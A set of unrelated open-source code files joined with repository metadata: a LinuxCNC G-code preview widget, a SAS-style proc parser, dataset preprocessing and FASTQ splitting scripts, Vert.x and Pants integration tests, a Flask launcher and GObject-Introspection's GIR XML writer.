True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'show_live_plot' : ( gobject.TYPE_BOOLEAN, 'Show live plot', 'Show machine plot',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'show_velocity' : ( gobject.TYPE_BOOLEAN, 'Show tool speed', 'Show tool velocity',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'show_program' : ( gobject.TYPE_BOOLEAN, 'Show program', 'Show program',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'show_rapids' : ( gobject.TYPE_BOOLEAN, 'Show rapids', 'Show rapid moves',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'show_tool' : ( gobject.TYPE_BOOLEAN, 'Show tool', 'Show tool',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'show_dtg' : ( gobject.TYPE_BOOLEAN, 'Show DTG', 'Show Distance To Go',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'show_lathe_radius' : ( gobject.TYPE_BOOLEAN, 'Show Lathe Radius', 'Show X axis in Radius',
False, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'grid_size' : ( gobject.TYPE_FLOAT, 'Grid Size', 'Grid Size',
0, 100, 0, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'use_joints_mode' : ( gobject.TYPE_BOOLEAN, 'Use joints mode', 'Use joints mode',
False, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'use_default_controls' : ( gobject.TYPE_BOOLEAN, 'Use Default Mouse Controls', 'Use Default Mouse Controls',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
}
__gproperties = __gproperties__
def __init__(self, *a, **kw):
inifile = os.environ.get('INI_FILE_NAME', '/dev/null')
inifile = linuxcnc.ini(inifile)
gremlin.Gremlin.__init__(self, inifile)
self.gstat = GStat()
self.gstat.connect('file-loaded', self.fileloaded)
self.show()
def fileloaded(self,w,f):
try:
self._load(f)
except AttributeError,detail:
#AttributeError: 'NoneType' object has no attribute 'gl_end'
print 'hal_gremlin: continuing after',detail
def do_get_property(self, property):
name = property.name.replace('-', '_')
if name == 'view':
return self.current_view
elif name in self.__gproperties.keys():
return getattr(self, name)
else:
raise AttributeError('unknown property %s' % property.name)
def do_set_property(self, property, value):
name = property.name.replace('-', '_')
if name == 'view':
view = value.lower()
if self.lathe_option:
if view not in ['p','y','y2']:
return False
elif view not in ['p', 'x', 'y', 'z', 'z2']:
return False
self.current_view = view
if self.initialised:
self.set_current_view()
elif name == 'enable_dro':
self.enable_dro = value
elif name == 'metric_units':
self.metric_units = value
elif name in self.__gproperties.keys():
setattr(self, name, value)
else:
raise AttributeError('unknown property %s' % property.name)
self.queue_draw()
return True
# This overrides glcannon.py method so we can change the DRO
def dro_format(self,s,spd,dtg,limit,homed,positions,axisdtg,g5x_offset,g92_offset,tlo_offset):
if not self.enable_dro:
return limit, homed, [''], ['']
if self.metric_units:
format = "% 6s:% 9.3f"
if self.show_dtg:
droformat = " " + format + " DTG %1s:% 9.3f"
else:
droformat = " " + format
offsetformat = "% 5s %1s:% 9.3f G92 %1s:% 9.3f"
rotformat = "% 5s %1s:% 9.3f"
else:
format = "% 6s:% 9.4f"
if self.show_dtg:
droformat = " " + format + " DTG %1s:% 9.4f"
else:
droformat = " " + format
offsetformat = "% 5s %1s:% 9.4f G92 %1s:% 9.4f"
rotformat = "% 5s %1s:% 9.4f"
diaformat = " " + format
posstrs = []
droposstrs = []
for i in range(9):
a = "XYZABCUVW"[i]
if s.axis_mask & (1<<i):
posstrs.append(format % (a, positions[i]))
if self.show_dtg:
droposstrs.append(droformat % (a, positions[i], a, axisdtg[i]))
else:
droposstrs.append(droformat % (a, positions[i]))
droposstrs.append("")
for i in range(9):
index = s.g5x_index
if index<7:
label = "G5%d" % (index+3)
else:
label = "G59.%d" % (index-6)
a = "XYZABCUVW"[i]
if s.axis_mask & (1<<i):
droposstrs.append(offsetformat % (label, a, g5x_offset[i], a, g92_offset[i]))
droposstrs.append(rotformat % (label, 'R', s.rotation_xy))
droposstrs.append("")
for i in range(9):
a = "XYZABCUVW"[i]
if s.axis_mask & (1<<i):
droposstrs.append(rotformat % ("TLO", a, tlo_offset[i]))
# if its a lathe only show radius or diameter as per property
# we have to adjust the homing icon to line up:
if self.is_lathe():
if homed[0]:
homed.pop(0)
homed.pop(0)
homed.insert(0,1)
homed.insert(0,0)
posstrs[0] = ""
if self.show_lathe_radius:
posstrs.insert(1, format % ("Rad", positions[0]))
else:
posstrs.insert(1, format % ("Dia", positions[0]*2.0))
droposstrs[0] = ""
if self.show_dtg:
if self.show_lathe_radius:
droposstrs.insert(1, droformat % ("Rad", positions[0], "R", axisdtg[0]))
else:
droposstrs.insert(1, droformat % ("Dia", positions[0]*2.0, "D", axisdtg[0]*2.0))
else:
if self.show_lathe_radius:
droposstrs.insert(1, droformat % ("Rad", positions[0]))
else:
droposstrs.insert(1, diaformat % ("Dia", positions[0]*2.0))
if self.show_velocity:
posstrs.append(format % ("Vel", spd))
pos=0
for i in range(9):
if s.axis_mask & (1<<i): pos +=1
if self.is_lathe:
pos +=1
droposstrs.insert(pos, " " + format % ("Vel", spd))
if self.show_dtg:
posstrs.append(format % ("DTG", dtg))
return limit, homed, posstrs, droposstrs
def realize(self, widget):
gremlin.Gremlin.realize(self, widget)
@rs274.glcanon.with_context
def _load(self, filename):
return self.load(filename)
# TODO fix this so it doesn't print twice and it should probably pop up a dialog
def report_gcode_error(self, result, seq, filename):
error_str = gcode.strerror(result)
print("G-Code error in " + os.path.basename(filename) + "\n" + "Near line "
+ str(seq) + " of\n" + filename + "\n" + error_str + "\n")
| lgpl-2.1 | 7,631,646,314,919,300,000 | 43.533937 | 121 | 0.536883 | false |
chappers/Stan | stan/proc/proc_parse.py | 1 | 1781 | """
The :mod:`stan.proc.proc_parse` module is the proc parser for SAS-like language.
"""
import re
import pkgutil
from stan.proc.proc_expr import RESERVED_KEYWORDS, PROC_
import stan.proc_functions as proc_func
from stan.proc.proc_sql import proc_sql
def proc_parse(cstr):
"""proc parse converts procedure statements to python function equivalents
Parameters
----------
v_ls : list of tokens
Notes
-----
``data`` and ``output``/``out`` are protected variables.
If you wish to use a DataFrame as an argument, prepend ``dt_`` for the parser to interpret this correctly
"""
# if cstr is in the form "proc sql" we won't pass tokens
if re.match(r"^\s*proc\s*sql", cstr.strip(), re.IGNORECASE):
return proc_sql(cstr.strip())
v_ls = PROC_.parseString(cstr)
sls = []
preprend = ''
for ls in v_ls[1:]:
if len(ls[1:]) > 1:
sls.append("%s=['%s']" % (ls[0], "','".join(ls[1:])))
else:
if ls[0].startswith('dt_') or ls[0] in ['data']: # hungarian notation if we want to use DataFrame as a variable
sls.append("%s=%s" % (ls[0], ls[1]))
elif ls[0] in ['output', 'out']:
preprend += '%s=' % ls[1]
else:
sls.append("%s='%s'" % (ls[0], ls[1]))
# try to find v_ls[0] in the `proc_func` namespace...
f_name = v_ls[0].strip().lower()
if f_name in [name for _, name, _ in pkgutil.iter_modules(proc_func.__path__)]: # is there a better way?
func_name = "%s.%s" % (f_name, f_name)
else:
func_name = f_name
return '%s%s(%s)' % (preprend, func_name, ','.join(sls)) # this statement is a bit dodgy
| mit | -3,020,345,216,742,110,000 | 29.706897 | 123 | 0.540707 | false |
DistributedML/TorML | ML/data/amazon/parse_amazon.py | 1 | 1657 | import numpy as np
import pandas as pd
import arff
import pdb
def main():
data = np.load('amazon.npy')
# Shuffle the data
sfflidx = np.random.permutation(data.shape[0])
data = data[sfflidx]
testidx = int(data.shape[0] * 0.7)
testdata = data[testidx:, ]
traindata = data[0:testidx, ]
# standardize each column
traindata[:, 0:10000], _, _ = standardize_cols(traindata[:, 0:10000])
testdata[:, 0:10000], _, _ = standardize_cols(testdata[:, 0:10000])
for i in range(int(np.max(data[:, 10000]) + 1)):
idx = np.where(traindata[:, 10000] == i)[0]
print("Label " + str(i) + " has " + str(len(idx)))
labeldata = traindata[idx]
np.save("amazon" + str(i), labeldata)
np.save("amazon_train", traindata)
np.save("amazon_test", testdata)
# # Make a bad dataset, push class 0 to 11 (normal)
# baddata = traindata[np.where(traindata[:, 41] == 0)[0]]
# baddata[:, -1] = 11
# np.save("kddcup_bad", baddata)
def load_raw():
datadump = arff.load(open('amazon.arff', 'rb'))
data = np.array(datadump['data'])
# Convert labels to categorical
data[:, -1] = np.argmax(pd.get_dummies(data[:, -1]).values, axis=1)
data = data.astype(float)
pdb.set_trace()
np.save("amazon", data)
def standardize_cols(X, mu=None, sigma=None):
# Standardize each column with mean 0 and variance 1
n_rows, n_cols = X.shape
if mu is None:
mu = np.mean(X, axis=0)
if sigma is None:
sigma = np.std(X, axis=0)
sigma[sigma < 1e-8] = 1.
return (X - mu) / sigma, mu, sigma
if __name__ == "__main__":
main()
| mit | 6,870,042,225,450,228,000 | 22.338028 | 73 | 0.581774 | false |
SteffenGuertler/vertx-mod-asyncmongodb | src/test/resources/integration_tests/python/basic_integration_test.py | 1 | 1751 | # Simple integration test which shows tests deploying other verticles, using the Vert.x API etc
from org.vertx.testtools import VertxAssert
import vertx_tests
from core.event_bus import EventBus
import vertx
# The test methods must begin with "test"
def test_http():
# Create an HTTP server which just sends back OK response immediately
def req_handler(req):
req.response.end()
def resp_handler(resp):
VertxAssert.assertTrue(200 == resp.status_code)
# If we get here, the test is complete
# You must always call `testComplete()` at the end. Remember that testing is *asynchronous* so
# we cannot assume the test is complete by the time the test method has finished executing like
# in standard synchronous tests
VertxAssert.testComplete()
def listen_handler(err, server):
VertxAssert.assertNull(err)
# The server is listening so send an HTTP request
vertx.create_http_client().set_port(8181).get_now("/", resp_handler)
vertx.create_http_server().request_handler(req_handler).listen(8181, "0.0.0.0", listen_handler)
# This test deploys some arbitrary verticle - note that the call to testComplete() is inside the Verticle `SomeVerticle`
def test_deploy_arbitrary_verticle():
vertx.deploy_verticle('de.steffeng.trials.vertx.urlrewritingproxy.integration.java.SomeVerticle')
# This demonstrates how tests are asynchronous - the timer does not fire until 1 second later -
# which is almost certainly after the test method has completed.
def test_complete_on_timer():
def handler(timer_id):
VertxAssert.assertNotNull(timer_id)
VertxAssert.testComplete()
vertx.set_timer(1000, handler)
vertx_tests.start_tests(locals())
| mit | -6,766,657,994,172,449,000 | 40.690476 | 120 | 0.727013 | false |
tdyas/pants | tests/python/pants_test/backend/jvm/tasks/jvm_compile/rsc/test_rsc_compile_integration.py | 1 | 2189 | # Copyright 2018 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import pytest
from pants_test.backend.jvm.tasks.jvm_compile.rsc.rsc_compile_integration_base import (
RscCompileIntegrationBase,
ensure_compile_rsc_execution_strategy,
)
class RscCompileIntegration(RscCompileIntegrationBase):
@pytest.mark.skip(reason="flaky: https://github.com/pantsbuild/pants/issues/7856")
@ensure_compile_rsc_execution_strategy(RscCompileIntegrationBase.rsc_and_zinc)
def test_basic_binary(self):
self._testproject_compile("mutual", "bin", "A")
@ensure_compile_rsc_execution_strategy(
RscCompileIntegrationBase.rsc_and_zinc,
PANTS_COMPILE_RSC_SCALA_WORKFLOW_OVERRIDE="zinc-only",
)
def test_workflow_override(self):
self._testproject_compile("mutual", "bin", "A", outline_result=False)
@ensure_compile_rsc_execution_strategy(RscCompileIntegrationBase.rsc_and_zinc)
def test_executing_multi_target_binary(self):
pants_run = self.do_command("run", "examples/src/scala/org/pantsbuild/example/hello/exe")
self.assertIn("Hello, Resource World!", pants_run.stdout_data)
@pytest.mark.skip(reason="flaky: https://github.com/pantsbuild/pants/issues/8679")
@ensure_compile_rsc_execution_strategy(RscCompileIntegrationBase.rsc_and_zinc)
def test_java_with_transitive_exported_scala_dep(self):
self.do_command(
"compile",
"testprojects/src/scala/org/pantsbuild/testproject/javadepsonscalatransitive:java-in-different-package",
)
@ensure_compile_rsc_execution_strategy(RscCompileIntegrationBase.rsc_and_zinc)
def test_java_sources(self):
self.do_command("compile", "testprojects/src/scala/org/pantsbuild/testproject/javasources")
@ensure_compile_rsc_execution_strategy(RscCompileIntegrationBase.rsc_and_zinc)
def test_node_dependencies(self):
self.do_command(
"compile", "contrib/node/examples/src/java/org/pantsbuild/testproject/jsresources"
)
def test_rsc_hermetic_jvm_options(self):
self._test_hermetic_jvm_options(self.rsc_and_zinc)
| apache-2.0 | -6,702,051,356,664,883,000 | 43.673469 | 116 | 0.727273 | false |
Magda-M/general-tools | fq.split.py | 1 | 2084 | """
SOURCE: https://gist.github.com/brentp/6625544
split a single fastq file in to random, non-overlapping subsets
arguments:
+ fastq file
+ number of splits
+ number of reps
e.g.:
python fq.split.py input.fastq 3 4
will create 12 new files in 4 sets of 3. Each
set of 3 will contain all of the original records.
"""
import gzip
import random
from itertools import islice, izip
xopen = lambda fq: gzip.open(fq) if fq.endswith('.gz') else open(fq)
def fqiter(fq, lines_per_read):
with xopen(fq) as fh:
fqclean = (x.strip("\r\n") for x in fh if x.strip())
while True:
rec = [x for x in islice(fqclean, lines_per_read)]
if not rec: raise StopIteration
assert all(rec) and len(rec) == lines_per_read
yield rec
def fqsplit(fq, nchunks, nreps, paired, prefix=None):
if paired:
lines_per_read = 8
else:
lines_per_read = 4
if prefix == None: prefix = fq + ".split"
prefix += "chunk-%i.rep-%i.fq"
fq_size = sum(1 for x in xopen(fq) if len(x.strip("\r\n"))>0)
assert fq_size % lines_per_read == 0
fq_size /= lines_per_read # number of records
print >>sys.stderr, "num reads/read pairs:", fq_size
print >>sys.stderr, "num chunks to split into:", nchunks
if fq_size % nchunks == 0 :
chunk_size = fq_size // nchunks
else:
chunk_size = 1 + (fq_size) // nchunks
print >>sys.stderr, "chunk_size:", chunk_size
for rep in range(1, nreps + 1):
files = [open(prefix % (c, rep), 'w') for c in range(1, nchunks + 1)]
ints = range(fq_size)
random.shuffle(ints)
for i, fqr in izip(ints, fqiter(fq, lines_per_read)):
chunk, chunk_i = divmod(i, chunk_size)
print >>files[chunk], "\n".join(fqr)
[f.close() for f in files]
if __name__ == "__main__":
import sys
fq = sys.argv[1]
nchunks = int(sys.argv[2])
nreps = int(sys.argv[3])
paired = bool(int(sys.argv[4]))
print paired# 0 = single, 1 = paired end reads
fqsplit(fq, nchunks, nreps, paired) | gpl-3.0 | 607,869,430,377,086,200 | 27.561644 | 77 | 0.597409 | false |
goniz/buildscript | build_system/source.py | 1 | 2177 | #!/usr/bin/python2
from build_exceptions import BuildError
import os
import re
class File(object):
def __init__(self, path):
self.path = path
def is_newer(self, other):
if os.path.exists(other) is False:
return True
if os.path.exists(self.path) is False:
raise BuildError('SourceFile.path does not exists??')
obj = os.stat(other).st_ctime
me = os.stat(self.path).st_ctime
if me > obj:
return True
return False
@property
def extension(self):
regex = '\.(\w+)$'
return re.findall(regex, self.path)[0]
@property
def filename(self):
return os.path.basename(self.path)
def __str__(self):
return self.filename
def __repr__(self):
return str(self)
class Directory(object):
def __init__(self, path, exts=None):
self.path = path
if isinstance(exts, str):
self.extensions = [exts]
elif not isinstance(exts, list):
raise TypeError('exts should be a list of strings! got %s' % (exts, ))
else:
self.extensions = [] if exts is None else exts
def add_extension(self, ext):
if not ext in self.extensions:
self.extensions.append(ext)
def generate_regex(self):
return '\.(%s)$' % ('|'.join(self.extensions), )
def discover(self, output=File):
regex = self.generate_regex()
files = os.listdir(self.path)
files = map(lambda x: os.path.join(self.path, x), files)
files = filter(lambda x: re.findall(regex, x), files)
return map(output, files)
class SourceFile(File):
@property
def objectfile(self):
return self.filename.replace(self.extension, 'o')
@property
def language(self):
ext = self.extension
if 'c' == ext:
return 'c'
elif 'py' == ext:
return 'python'
elif 'cpp' == ext:
return 'cpp'
else:
return 'Unknown'
class SourceDirectory(Directory):
def discover(self, output=SourceFile):
return super(self.__class__, self).discover(output) | mit | -8,906,877,451,912,974,000 | 24.623529 | 82 | 0.569132 | false |
dkkline/CanSat14-15 | presenter/__init__.py | 1 | 1230 | """
Contains a Flask-based webserver in charge of presenting a website and
collected data to users connected via a webbrowser.
"""
__version__ = (0, 0, 1)
from .app import app
from .config import DevelopmentConfig, ProductionConfig
from flask_debugtoolbar import DebugToolbarExtension
def run_dev():
"""
Runs the presenter module in developer mode.
"""
# pylint: disable=unused-variable
from . import views # noqa
# pylint: enable=unused-variable
app.config.from_object(DevelopmentConfig)
toolbar = DebugToolbarExtension(app)
app.run(use_reloader=False, host=DevelopmentConfig.HOST,
port=DevelopmentConfig.PORT)
def run_prod():
"""
Runs the presenter module in production mode.
"""
# pylint: disable=unused-variable
from . import views # noqa
# pylint: enable=unused-variable
from tornado.wsgi import WSGIContainer
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
from presenter import app
app.config.from_object(ProductionConfig)
http_server = HTTPServer(WSGIContainer(app))
http_server.listen(ProductionConfig.PORT)
IOLoop.instance().start()
if __name__ == '__main__':
run()
| mit | -3,177,141,107,318,055,400 | 22.653846 | 70 | 0.701626 | false |
alexef/gobject-introspection | giscanner/girwriter.py | 1 | 23830 | # -*- Mode: Python -*-
# GObject-Introspection - a framework for introspecting GObject libraries
# Copyright (C) 2008 Johan Dahlin
# Copyright (C) 2008, 2009 Red Hat, Inc.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place - Suite 330,
# Boston, MA 02111-1307, USA.
#
from __future__ import with_statement
from . import ast
from .xmlwriter import XMLWriter
# Bump this for *incompatible* changes to the .gir.
# Compatible changes we just make inline
COMPATIBLE_GIR_VERSION = '1.2'
class GIRWriter(XMLWriter):
def __init__(self, namespace, shlibs, includes, pkgs, c_includes):
super(GIRWriter, self).__init__()
self.write_comment(
'''This file was automatically generated from C sources - DO NOT EDIT!
To affect the contents of this file, edit the original C definitions,
and/or use gtk-doc annotations. ''')
self._write_repository(namespace, shlibs, includes, pkgs,
c_includes)
def _write_repository(self, namespace, shlibs, includes=None,
packages=None, c_includes=None):
if includes is None:
includes = frozenset()
if packages is None:
packages = frozenset()
if c_includes is None:
c_includes = frozenset()
attrs = [
('version', COMPATIBLE_GIR_VERSION),
('xmlns', 'http://www.gtk.org/introspection/core/1.0'),
('xmlns:c', 'http://www.gtk.org/introspection/c/1.0'),
('xmlns:glib', 'http://www.gtk.org/introspection/glib/1.0'),
]
with self.tagcontext('repository', attrs):
for include in sorted(includes):
self._write_include(include)
for pkg in sorted(set(packages)):
self._write_pkgconfig_pkg(pkg)
for c_include in sorted(set(c_includes)):
self._write_c_include(c_include)
self._namespace = namespace
self._write_namespace(namespace, shlibs)
self._namespace = None
def _write_include(self, include):
attrs = [('name', include.name), ('version', include.version)]
self.write_tag('include', attrs)
def _write_pkgconfig_pkg(self, package):
attrs = [('name', package)]
self.write_tag('package', attrs)
def _write_c_include(self, c_include):
attrs = [('name', c_include)]
self.write_tag('c:include', attrs)
def _write_namespace(self, namespace, shlibs):
attrs = [('name', namespace.name),
('version', namespace.version),
('shared-library', ','.join(shlibs)),
('c:identifier-prefixes', ','.join(namespace.identifier_prefixes)),
('c:symbol-prefixes', ','.join(namespace.symbol_prefixes))]
with self.tagcontext('namespace', attrs):
# We define a custom sorting function here because
# we want aliases to be first. They're a bit
# special because the typelib compiler expands them.
def nscmp(a, b):
if isinstance(a, ast.Alias):
if isinstance(b, ast.Alias):
return cmp(a.name, b.name)
else:
return -1
elif isinstance(b, ast.Alias):
return 1
else:
return cmp(a, b)
for node in sorted(namespace.itervalues(), cmp=nscmp):
self._write_node(node)
def _write_node(self, node):
if isinstance(node, ast.Function):
self._write_function(node)
elif isinstance(node, ast.Enum):
self._write_enum(node)
elif isinstance(node, ast.Bitfield):
self._write_bitfield(node)
elif isinstance(node, (ast.Class, ast.Interface)):
self._write_class(node)
elif isinstance(node, ast.Callback):
self._write_callback(node)
elif isinstance(node, ast.Record):
self._write_record(node)
elif isinstance(node, ast.Union):
self._write_union(node)
elif isinstance(node, ast.Boxed):
self._write_boxed(node)
elif isinstance(node, ast.Member):
# FIXME: atk_misc_instance singleton
pass
elif isinstance(node, ast.Alias):
self._write_alias(node)
elif isinstance(node, ast.Constant):
self._write_constant(node)
else:
print 'WRITER: Unhandled node', node
def _append_version(self, node, attrs):
if node.version:
attrs.append(('version', node.version))
def _write_generic(self, node):
for key, value in node.attributes:
self.write_tag('attribute', [('name', key), ('value', value)])
if hasattr(node, 'doc') and node.doc:
self.write_tag('doc', [('xml:whitespace', 'preserve')],
node.doc.strip())
def _append_node_generic(self, node, attrs):
if node.skip or not node.introspectable:
attrs.append(('introspectable', '0'))
if node.deprecated:
attrs.append(('deprecated', node.deprecated))
if node.deprecated_version:
attrs.append(('deprecated-version',
node.deprecated_version))
def _append_throws(self, func, attrs):
if func.throws:
attrs.append(('throws', '1'))
def _write_alias(self, alias):
attrs = [('name', alias.name)]
if alias.ctype is not None:
attrs.append(('c:type', alias.ctype))
self._append_node_generic(alias, attrs)
with self.tagcontext('alias', attrs):
self._write_generic(alias)
self._write_type_ref(alias.target)
def _write_callable(self, callable, tag_name, extra_attrs):
attrs = [('name', callable.name)]
attrs.extend(extra_attrs)
self._append_version(callable, attrs)
self._append_node_generic(callable, attrs)
self._append_throws(callable, attrs)
with self.tagcontext(tag_name, attrs):
self._write_generic(callable)
self._write_return_type(callable.retval, parent=callable)
self._write_parameters(callable, callable.parameters)
def _write_function(self, func, tag_name='function'):
attrs = []
if hasattr(func, 'symbol'):
attrs.append(('c:identifier', func.symbol))
if func.shadowed_by:
attrs.append(('shadowed-by', func.shadowed_by))
elif func.shadows:
attrs.append(('shadows', func.shadows))
self._write_callable(func, tag_name, attrs)
def _write_method(self, method):
self._write_function(method, tag_name='method')
def _write_static_method(self, method):
self._write_function(method, tag_name='function')
def _write_constructor(self, method):
self._write_function(method, tag_name='constructor')
def _write_return_type(self, return_, parent=None):
if not return_:
return
attrs = []
if return_.transfer:
attrs.append(('transfer-ownership', return_.transfer))
if return_.skip:
attrs.append(('skip', '1'))
with self.tagcontext('return-value', attrs):
self._write_generic(return_)
self._write_type(return_.type, function=parent)
def _write_parameters(self, parent, parameters):
if not parameters:
return
with self.tagcontext('parameters'):
for parameter in parameters:
self._write_parameter(parent, parameter)
def _write_parameter(self, parent, parameter):
attrs = []
if parameter.argname is not None:
attrs.append(('name', parameter.argname))
if (parameter.direction is not None) and (parameter.direction != 'in'):
attrs.append(('direction', parameter.direction))
attrs.append(('caller-allocates',
'1' if parameter.caller_allocates else '0'))
if parameter.transfer:
attrs.append(('transfer-ownership',
parameter.transfer))
if parameter.allow_none:
attrs.append(('allow-none', '1'))
if parameter.scope:
attrs.append(('scope', parameter.scope))
if parameter.closure_name is not None:
idx = parent.get_parameter_index(parameter.closure_name)
attrs.append(('closure', '%d' % (idx, )))
if parameter.destroy_name is not None:
idx = parent.get_parameter_index(parameter.destroy_name)
attrs.append(('destroy', '%d' % (idx, )))
if parameter.skip:
attrs.append(('skip', '1'))
with self.tagcontext('parameter', attrs):
self._write_generic(parameter)
self._write_type(parameter.type, function=parent)
def _type_to_name(self, typeval):
if not typeval.resolved:
raise AssertionError("Caught unresolved type %r (ctype=%r)" % (typeval, typeval.ctype))
assert typeval.target_giname is not None
prefix = self._namespace.name + '.'
if typeval.target_giname.startswith(prefix):
return typeval.target_giname[len(prefix):]
return typeval.target_giname
def _write_type_ref(self, ntype):
""" Like _write_type, but only writes the type name rather than the full details """
assert isinstance(ntype, ast.Type), ntype
attrs = []
if ntype.ctype:
attrs.append(('c:type', ntype.ctype))
if isinstance(ntype, ast.Array):
if ntype.array_type != ast.Array.C:
attrs.insert(0, ('name', ntype.array_type))
elif isinstance(ntype, ast.List):
if ntype.name:
attrs.insert(0, ('name', ntype.name))
elif isinstance(ntype, ast.Map):
attrs.insert(0, ('name', 'GLib.HashTable'))
else:
if ntype.target_giname:
attrs.insert(0, ('name', self._type_to_name(ntype)))
elif ntype.target_fundamental:
attrs.insert(0, ('name', ntype.target_fundamental))
self.write_tag('type', attrs)
def _write_type(self, ntype, relation=None, function=None):
assert isinstance(ntype, ast.Type), ntype
attrs = []
if ntype.ctype:
attrs.append(('c:type', ntype.ctype))
if isinstance(ntype, ast.Varargs):
with self.tagcontext('varargs', []):
pass
elif isinstance(ntype, ast.Array):
if ntype.array_type != ast.Array.C:
attrs.insert(0, ('name', ntype.array_type))
# we insert an explicit 'zero-terminated' attribute
# when it is false, or when it would not be implied
# by the absence of length and fixed-size
if not ntype.zeroterminated:
attrs.insert(0, ('zero-terminated', '0'))
elif (ntype.zeroterminated
and (ntype.size is not None or ntype.length_param_name is not None)):
attrs.insert(0, ('zero-terminated', '1'))
if ntype.size is not None:
attrs.append(('fixed-size', '%d' % (ntype.size, )))
if ntype.length_param_name is not None:
assert function
attrs.insert(0, ('length', '%d'
% (function.get_parameter_index(ntype.length_param_name, ))))
with self.tagcontext('array', attrs):
self._write_type(ntype.element_type)
elif isinstance(ntype, ast.List):
if ntype.name:
attrs.insert(0, ('name', ntype.name))
with self.tagcontext('type', attrs):
self._write_type(ntype.element_type)
elif isinstance(ntype, ast.Map):
attrs.insert(0, ('name', 'GLib.HashTable'))
with self.tagcontext('type', attrs):
self._write_type(ntype.key_type)
self._write_type(ntype.value_type)
else:
# REWRITEFIXME - enable this for 1.2
if ntype.target_giname:
attrs.insert(0, ('name', self._type_to_name(ntype)))
elif ntype.target_fundamental:
# attrs = [('fundamental', ntype.target_fundamental)]
attrs.insert(0, ('name', ntype.target_fundamental))
elif ntype.target_foreign:
attrs.insert(0, ('foreign', '1'))
self.write_tag('type', attrs)
def _append_registered(self, node, attrs):
assert isinstance(node, ast.Registered)
if node.get_type:
attrs.extend([('glib:type-name', node.gtype_name),
('glib:get-type', node.get_type)])
def _write_enum(self, enum):
attrs = [('name', enum.name)]
self._append_version(enum, attrs)
self._append_node_generic(enum, attrs)
self._append_registered(enum, attrs)
attrs.append(('c:type', enum.ctype))
if enum.error_quark:
attrs.append(('glib:error-quark', enum.error_quark))
with self.tagcontext('enumeration', attrs):
self._write_generic(enum)
for member in enum.members:
self._write_member(member)
def _write_bitfield(self, bitfield):
attrs = [('name', bitfield.name)]
self._append_version(bitfield, attrs)
self._append_node_generic(bitfield, attrs)
self._append_registered(bitfield, attrs)
attrs.append(('c:type', bitfield.ctype))
with self.tagcontext('bitfield', attrs):
self._write_generic(bitfield)
for member in bitfield.members:
self._write_member(member)
def _write_member(self, member):
attrs = [('name', member.name),
('value', str(member.value)),
('c:identifier', member.symbol)]
if member.nick is not None:
attrs.append(('glib:nick', member.nick))
self.write_tag('member', attrs)
def _write_constant(self, constant):
attrs = [('name', constant.name), ('value', constant.value)]
with self.tagcontext('constant', attrs):
self._write_type(constant.value_type)
def _write_class(self, node):
attrs = [('name', node.name),
('c:symbol-prefix', node.c_symbol_prefix),
('c:type', node.ctype)]
self._append_version(node, attrs)
self._append_node_generic(node, attrs)
if isinstance(node, ast.Class):
tag_name = 'class'
if node.parent is not None:
attrs.append(('parent',
self._type_to_name(node.parent)))
if node.is_abstract:
attrs.append(('abstract', '1'))
else:
assert isinstance(node, ast.Interface)
tag_name = 'interface'
attrs.append(('glib:type-name', node.gtype_name))
if node.get_type is not None:
attrs.append(('glib:get-type', node.get_type))
if node.glib_type_struct is not None:
attrs.append(('glib:type-struct',
self._type_to_name(node.glib_type_struct)))
if isinstance(node, ast.Class):
if node.fundamental:
attrs.append(('glib:fundamental', '1'))
if node.ref_func:
attrs.append(('glib:ref-func', node.ref_func))
if node.unref_func:
attrs.append(('glib:unref-func', node.unref_func))
if node.set_value_func:
attrs.append(('glib:set-value-func', node.set_value_func))
if node.get_value_func:
attrs.append(('glib:get-value-func', node.get_value_func))
with self.tagcontext(tag_name, attrs):
self._write_generic(node)
if isinstance(node, ast.Class):
for iface in sorted(node.interfaces):
self.write_tag('implements',
[('name', self._type_to_name(iface))])
if isinstance(node, ast.Interface):
for iface in sorted(node.prerequisites):
self.write_tag('prerequisite',
[('name', self._type_to_name(iface))])
if isinstance(node, ast.Class):
for method in sorted(node.constructors):
self._write_constructor(method)
if isinstance(node, (ast.Class, ast.Interface)):
for method in sorted(node.static_methods):
self._write_static_method(method)
for vfunc in sorted(node.virtual_methods):
self._write_vfunc(vfunc)
for method in sorted(node.methods):
self._write_method(method)
for prop in sorted(node.properties):
self._write_property(prop)
for field in node.fields:
self._write_field(field)
for signal in sorted(node.signals):
self._write_signal(signal)
def _write_boxed(self, boxed):
attrs = [('glib:name', boxed.name)]
if boxed.c_symbol_prefix is not None:
attrs.append(('c:symbol-prefix', boxed.c_symbol_prefix))
self._append_registered(boxed, attrs)
with self.tagcontext('glib:boxed', attrs):
self._write_generic(boxed)
for method in sorted(boxed.constructors):
self._write_constructor(method)
for method in sorted(boxed.methods):
self._write_method(method)
for method in sorted(boxed.static_methods):
self._write_static_method(method)
def _write_property(self, prop):
attrs = [('name', prop.name)]
self._append_version(prop, attrs)
self._append_node_generic(prop, attrs)
# Properties are assumed to be readable (see also generate.c)
if not prop.readable:
attrs.append(('readable', '0'))
if prop.writable:
attrs.append(('writable', '1'))
if prop.construct:
attrs.append(('construct', '1'))
if prop.construct_only:
attrs.append(('construct-only', '1'))
if prop.transfer:
attrs.append(('transfer-ownership', prop.transfer))
with self.tagcontext('property', attrs):
self._write_generic(prop)
self._write_type(prop.type)
